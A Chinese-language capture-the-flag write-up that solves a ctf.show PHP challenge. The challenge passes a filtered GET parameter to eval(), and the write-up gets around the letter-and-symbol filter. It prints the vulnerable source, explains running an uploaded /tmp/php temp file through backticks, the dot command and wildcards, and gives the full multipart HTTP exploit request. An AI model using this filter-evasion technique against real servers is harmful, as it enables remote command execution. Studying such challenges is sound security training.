本题其实就是一个无字母webshell,只是手法问题。
打开题目F12看到,其实就是告诉我们要传入一个cmd参数:
<!-- hint:?cmd= -->
得到题目源码:
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
highlight_file(__FILE__);
if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){
die("cerror");
}
if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){
die("serror");
}
eval($cmd);
}
?>
第一个waf里面过滤了字母(但留下一个p)、数字和“$”。则我们不能通过动态函数的方法来执行webshell,包括自增。
第二个waf中,过滤了我们常用的一些符号。
总结可以使用的:
小写字母p、"?"、"<"、">"、"="、"`"、"."、";"
php文件上传
对于php而言,文件上传功能是默认的行为,不论php代码是怎样
我们可以发送一个上传文件的post包,此时php会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpxxxxxx,文件名最后6个字符是随机的大小写字母。如/tmp/php123abc
在数据包中,文件上传格式为multipart/form-data类型, boundary定义边界符。如
Content-Type: multipart/form-data; boundary=this_is_boundary
其数据如下,上传的文件内容为:(上传一个bash脚本,#!/bin/sh为解释器)
#!/bin/sh
find / -name *flag*
--this_is_boundary
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain
#!/bin/sh
find / -name *flag*
--this_is_boundary--
ph命令执行
php里面有很多执行系统命令的函数,如exec等.
反引号也可以用于执行系统命令,并把执行完成的结果以字符串的形式返回,而本题未过滤反引号,可以进行利用.除此之外,我们还需要对执行结果进行输出,但是输出函数以及全部被过滤.这就涉及段标记语法了.<?= ... ?> 是在 PHP 中的一种短标记(short tag)语法,也被称为echo短标记,它可以简化输出变量或表达式的操作。使用<?= ... ?>就相当于echo … 使用段标记需要<?标签,因此我们构造 cmd=?><?=`.+/??p/p?p??????`;先把前面的<?php闭合,再与后面的?>形成一个短标签.再PHP里面.再Linux里面, .(点命令)使source命令的别名,用于读取并且在当前的shell中执行文件中的命令,加号+等价于空格,于是通过构造.+/执行后面的脚本文件.之后就是通过模糊匹配,用?通配符对上传的文件进行匹配,tmp目录写成??p,php临时文件写成p?p???,最后变成cmd=?><?=`.+/??p/p?p???`;
playload:
POST /?cmd=?><?=`.%20/??p/p?p??????`;?> HTTP/1.1
Host: bdb2fa1a-e91b-4ad8-b041-7e148786f12f.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=this_is_boundary
Content-Length: 163
--this_is_boundary
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain
#!/bin/sh
cat /flag.txt
--this_is_boundary--
p神文章: